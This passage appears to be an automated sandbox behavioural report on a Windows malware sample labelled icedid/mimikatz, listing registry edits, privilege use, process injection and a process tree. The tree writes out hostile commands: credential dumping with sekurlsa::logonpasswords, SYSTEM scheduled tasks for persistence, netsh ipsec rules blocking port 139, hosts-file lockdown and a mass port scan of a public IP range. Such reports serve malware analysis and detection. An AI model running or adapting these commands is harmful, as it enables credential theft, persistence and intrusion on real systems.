cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rwdxsq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qwnumhl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tthiuhlym.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1676 cmd.exe 1300 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023447-5.dat nsis_installer_2 behavioral2/files/0x0008000000023462-15.dat nsis_installer_1 behavioral2/files/0x0008000000023462-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qwnumhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" qwnumhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing qwnumhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" qwnumhl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" qwnumhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" qwnumhl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yntccnlcc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yntccnlcc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yntccnlcc.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" qwnumhl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ qwnumhl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ qwnumhl.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1300 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1780 schtasks.exe 2916 schtasks.exe 808 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found 684 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2848 qwnumhl.exe Token: SeDebugPrivilege 4584 qwnumhl.exe Token: SeDebugPrivilege 4408 vfshost.exe Token: SeDebugPrivilege 2692 yntccnlcc.exe Token: SeLockMemoryPrivilege 908 muckuc.exe Token: SeLockMemoryPrivilege 908 muckuc.exe Token: SeDebugPrivilege 1520 yntccnlcc.exe Token: SeDebugPrivilege 3812 yntccnlcc.exe Token: SeDebugPrivilege 4568 yntccnlcc.exe Token: SeDebugPrivilege 4748 yntccnlcc.exe Token: SeDebugPrivilege 4576 yntccnlcc.exe Token: SeDebugPrivilege 1708 yntccnlcc.exe Token: SeDebugPrivilege 1844 yntccnlcc.exe Token: SeDebugPrivilege 3260 yntccnlcc.exe Token: SeDebugPrivilege 1140 yntccnlcc.exe Token: SeDebugPrivilege 3564 yntccnlcc.exe Token: SeDebugPrivilege 3948 yntccnlcc.exe Token: SeDebugPrivilege 3148 yntccnlcc.exe Token: SeDebugPrivilege 3864 yntccnlcc.exe Token: SeDebugPrivilege 4552 yntccnlcc.exe Token: SeDebugPrivilege 1216 yntccnlcc.exe Token: SeDebugPrivilege 4212 yntccnlcc.exe Token: SeDebugPrivilege 656 yntccnlcc.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe 2848 qwnumhl.exe 2848 qwnumhl.exe 4584 qwnumhl.exe 4584 qwnumhl.exe 3116 xohudmc.exe 2520 rwdxsq.exe 552 qwnumhl.exe 552 qwnumhl.exe 5020 qwnumhl.exe 5020 qwnumhl.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4260 wrote to memory of 1676 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe 82 PID 4260 wrote to memory of 1676 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe 82 PID 4260 wrote to memory of 1676 4260 2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe 82 PID 1676 wrote to memory of 1300 1676 cmd.exe 84 PID 1676 wrote to memory of 1300 1676 cmd.exe 84 PID 1676 wrote to memory of 1300 1676 cmd.exe 84 PID 1676 wrote to memory of 2848 1676 cmd.exe 85 PID 1676 wrote to memory of 2848 1676 cmd.exe 85 PID 1676 wrote to memory of 2848 1676 cmd.exe 85 PID 4584 wrote to memory of 1580 4584 qwnumhl.exe 87 PID 4584 wrote to memory of 1580 4584 qwnumhl.exe 87 PID 4584 wrote to memory of 1580 4584 qwnumhl.exe 87 PID 1580 wrote to memory of 2124 1580 cmd.exe 89 PID 1580 wrote to memory of 2124 1580 cmd.exe 89 PID 1580 wrote to memory of 2124 1580 cmd.exe 89 PID 1580 wrote to memory of 2132 1580 cmd.exe 90 PID 1580 wrote to memory of 2132 1580 cmd.exe 90 PID 1580 wrote to memory of 2132 1580 cmd.exe 90 PID 1580 wrote to memory of 656 1580 cmd.exe 91 PID 1580 wrote to memory of 656 1580 cmd.exe 91 PID 1580 wrote to memory of 656 1580 cmd.exe 91 PID 1580 wrote to memory of 1724 1580 cmd.exe 92 PID 1580 wrote to memory of 1724 1580 cmd.exe 92 PID 1580 wrote to memory of 1724 1580 cmd.exe 92 PID 1580 wrote to memory of 948 1580 cmd.exe 93 PID 1580 wrote to memory of 948 1580 cmd.exe 93 PID 1580 wrote to memory of 948 1580 cmd.exe 93 PID 1580 wrote to memory of 3892 1580 cmd.exe 94 PID 1580 wrote to memory of 3892 1580 cmd.exe 94 PID 1580 wrote to memory of 3892 1580 cmd.exe 94 PID 4584 wrote to memory of 2084 4584 qwnumhl.exe 102 PID 4584 wrote to memory of 2084 4584 qwnumhl.exe 102 PID 4584 wrote to memory of 2084 4584 qwnumhl.exe 102 PID 4584 wrote to memory of 1236 4584 qwnumhl.exe 104 PID 4584 wrote to memory of 1236 4584 qwnumhl.exe 104 PID 4584 wrote to memory of 1236 4584 qwnumhl.exe 104 PID 4584 wrote to memory of 4356 4584 qwnumhl.exe 106 PID 4584 wrote to memory of 4356 4584 qwnumhl.exe 106 PID 4584 wrote to memory of 4356 4584 qwnumhl.exe 106 PID 4584 wrote to memory of 3960 4584 qwnumhl.exe 110 PID 4584 wrote to memory of 3960 4584 qwnumhl.exe 110 PID 4584 wrote to memory of 3960 4584 qwnumhl.exe 110 PID 3960 wrote to memory of 4240 3960 cmd.exe 112 PID 3960 wrote to memory of 4240 3960 cmd.exe 112 PID 3960 wrote to memory of 4240 3960 cmd.exe 112 PID 4240 wrote to memory of 3572 4240 wpcap.exe 113 PID 4240 wrote to memory of 3572 4240 wpcap.exe 113 PID 4240 wrote to memory of 3572 4240 wpcap.exe 113 PID 3572 wrote to memory of 2988 3572 net.exe 115 PID 3572 wrote to memory of 2988 3572 net.exe 115 PID 3572 wrote to memory of 2988 3572 net.exe 115 PID 4240 wrote to memory of 4348 4240 wpcap.exe 116 PID 4240 wrote to memory of 4348 4240 wpcap.exe 116 PID 4240 wrote to memory of 4348 4240 wpcap.exe 116 PID 4348 wrote to memory of 4260 4348 net.exe 118 PID 4348 wrote to memory of 4260 4348 net.exe 118 PID 4348 wrote to memory of 4260 4348 net.exe 118 PID 4240 wrote to memory of 4540 4240 wpcap.exe 119 PID 4240 wrote to memory of 4540 4240 wpcap.exe 119 PID 4240 wrote to memory of 4540 4240 wpcap.exe 119 PID 4540 wrote to memory of 2220 4540 net.exe 121 PID 4540 wrote to memory of 2220 4540 net.exe 121 PID 4540 wrote to memory of 2220 4540 net.exe 121 PID 4240 wrote to memory of 632 4240 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2076
-
C:\Windows\TEMP\eyutghbyg\muckuc.exe"C:\Windows\TEMP\eyutghbyg\muckuc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-28_882b186344a5dd4ddebf50c5fdfb6e59_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4260 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bcmpheym\qwnumhl.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1300
-
-
C:\Windows\bcmpheym\qwnumhl.exeC:\Windows\bcmpheym\qwnumhl.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2848
-
-
-
C:\Windows\bcmpheym\qwnumhl.exeC:\Windows\bcmpheym\qwnumhl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2124
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:656
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:948
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3892
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1236
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebieqpcpt\wckmimpgz\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3960 -
C:\Windows\ebieqpcpt\wckmimpgz\wpcap.exeC:\Windows\ebieqpcpt\wckmimpgz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4240 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4260
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2220
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:632 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3720
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1972
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4964 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2188 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebieqpcpt\wckmimpgz\tthiuhlym.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebieqpcpt\wckmimpgz\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4180 -
C:\Windows\ebieqpcpt\wckmimpgz\tthiuhlym.exeC:\Windows\ebieqpcpt\wckmimpgz\tthiuhlym.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\ebieqpcpt\wckmimpgz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ebieqpcpt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ebieqpcpt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1368 -
C:\Windows\ebieqpcpt\Corporate\vfshost.exeC:\Windows\ebieqpcpt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4408
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qcmpgptym" /ru system /tr "cmd /c C:\Windows\ime\qwnumhl.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1592 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qcmpgptym" /ru system /tr "cmd /c C:\Windows\ime\qwnumhl.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hezmwelcz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bcmpheym\qwnumhl.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hezmwelcz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bcmpheym\qwnumhl.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "hqccicrtu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyutghbyg\muckuc.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "hqccicrtu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eyutghbyg\muckuc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2916
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4272
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:792
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3148
-
-
